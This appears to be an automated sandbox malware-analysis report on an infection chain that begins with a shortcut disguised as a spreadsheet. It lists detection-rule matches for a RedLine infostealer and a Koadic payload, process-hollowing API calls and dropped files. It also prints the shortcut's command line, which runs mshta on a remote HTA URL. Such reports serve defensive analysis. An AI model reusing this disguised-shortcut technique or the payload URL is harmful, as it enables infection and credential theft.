                    Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                    Found URL in windows shortcut file (LNK)
                    Source: Initial fileStrings: https://www.sessosesso.it/assets/aw/yt.htaAC:
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\uc.exeJump to dropped file
                    Windows shortcut file (LNK) contains suspicious command line arguments
                    Source: FT. 40FE CNY .xlsx.lnkLNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0299C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,19_2_0299C3F8
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0299C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,19_2_0299C368
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0299C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,19_2_0299C4DC
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,19_2_02997AC0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,19_2_02997968
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,19_2_02997F48
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0299C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,19_2_0299C3F6
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,19_2_02997966
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,19_2_02997F46
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028BC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,24_2_028BC4DC
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,24_2_028B7AC0
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028B7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,24_2_028B7968
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028B7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,24_2_028B7F48
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028BC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,24_2_028BC3F8
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028BC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,24_2_028BC3F6
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028BC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,24_2_028BC368
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028B7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,24_2_028B7966
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028B7F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,24_2_028B7F46
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0299CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,19_2_0299CA6C
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAB970E6515_2_00007FFAAB970E65
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB955F8017_2_00007FFAAB955F80
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB9834B817_2_00007FFAAB9834B8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95BC9017_2_00007FFAAB95BC90
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95BC3517_2_00007FFAAB95BC35
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95BB3B17_2_00007FFAAB95BB3B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95E31817_2_00007FFAAB95E318
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95BA9917_2_00007FFAAB95BA99
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB95DFE017_2_00007FFAAB95DFE0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAB96CEA017_2_00007FFAAB96CEA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA2362E17_2_00007FFAABA2362E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA232A017_2_00007FFAABA232A0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029820C419_2_029820C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00408C6023_2_00408C60
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040DC1123_2_0040DC11
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00407C3F23_2_00407C3F
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00418CCC23_2_00418CCC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00406CA023_2_00406CA0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004028B023_2_004028B0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0041A4BE23_2_0041A4BE
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0041824423_2_00418244
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040165023_2_00401650
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00402F2023_2_00402F20
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004193C423_2_004193C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0041878823_2_00418788
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00402F8923_2_00402F89
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00402B9023_2_00402B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004073A023_2_004073A0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_3D94103023_2_3D941030
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_3D94102023_2_3D941020
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_411B99A023_2_411B99A0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_411B122023_2_411B1220
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_411B1AF023_2_411B1AF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_411BCD3023_2_411BCD30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_411B0ED823_2_411B0ED8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_411B3EDF23_2_411B3EDF
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_411B3EF023_2_411B3EF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_4145457023_2_41454570
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_4145004023_2_41450040
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_414560F023_2_414560F0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_4145337023_2_41453370
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_4145F3D123_2_4145F3D1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_41459B9023_2_41459B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_4145ABB023_2_4145ABB0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_4145D1A823_2_4145D1A8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_41453AB723_2_41453AB7
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_41D6516823_2_41D65168
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_41D6099023_2_41D60990
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00408C6023_1_00408C60
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0040DC1123_1_0040DC11
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00407C3F23_1_00407C3F
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00418CCC23_1_00418CCC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00406CA023_1_00406CA0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_004028B023_1_004028B0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0041A4BE23_1_0041A4BE
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0041824423_1_00418244
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0040165023_1_00401650
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00402F2023_1_00402F20
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_004193C423_1_004193C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0041878823_1_00418788
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00402F8923_1_00402F89
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00402B9023_1_00402B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_004073A023_1_004073A0
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: 24_2_028A20C424_2_028A20C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00408C6025_2_00408C60
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0040DC1125_2_0040DC11
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00407C3F25_2_00407C3F
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00418CCC25_2_00418CCC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00406CA025_2_00406CA0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_004028B025_2_004028B0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0041A4BE25_2_0041A4BE
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0041824425_2_00418244
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0040165025_2_00401650
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00402F2025_2_00402F20
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_004193C425_2_004193C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0041878825_2_00418788
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00402F8925_2_00402F89
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00402B9025_2_00402B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_004073A025_2_004073A0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_25B8103025_2_25B81030
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_25B8102025_2_25B81020
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29439A5825_2_29439A58
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29431AF025_2_29431AF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29430ED825_2_29430ED8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29433EEC25_2_29433EEC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29433EF025_2_29433EF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_2943122025_2_29431220
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_296DF3D125_2_296DF3D1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_296DABB025_2_296DABB0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_296D9B9025_2_296D9B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_296D457025_2_296D4570
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_296D068025_2_296D0680
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_296DD1A825_2_296DD1A8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_296D3AB725_2_296D3AB7
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29CB15FC25_2_29CB15FC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29CB15F025_2_29CB15F0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29FE099025_2_29FE0990
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_29FE516825_2_29FE5168
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\bwsiuvcU.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: String function: 0040D606 appears 72 times
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: String function: 0040E1D8 appears 132 times
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: String function: 028A6658 appears 32 times
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: String function: 028A4698 appears 156 times
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: String function: 028A4824 appears 629 times
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: String function: 029844A0 appears 67 times
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: String function: 02986658 appears 32 times
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: String function: 02984824 appears 883 times
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: String function: 02997BE8 appears 45 times
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: String function: 02984698 appears 247 times
                    Source: netutils.dll.19.drStatic PE information: Number of sections : 19 > 10
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: amsi64_7800.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winLNK@26/26@5/4
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02987F90 GetDiskFreeSpaceA,19_2_02987F90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,23_2_004019F0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02996D84 CoCreateInstance,19_2_02996D84
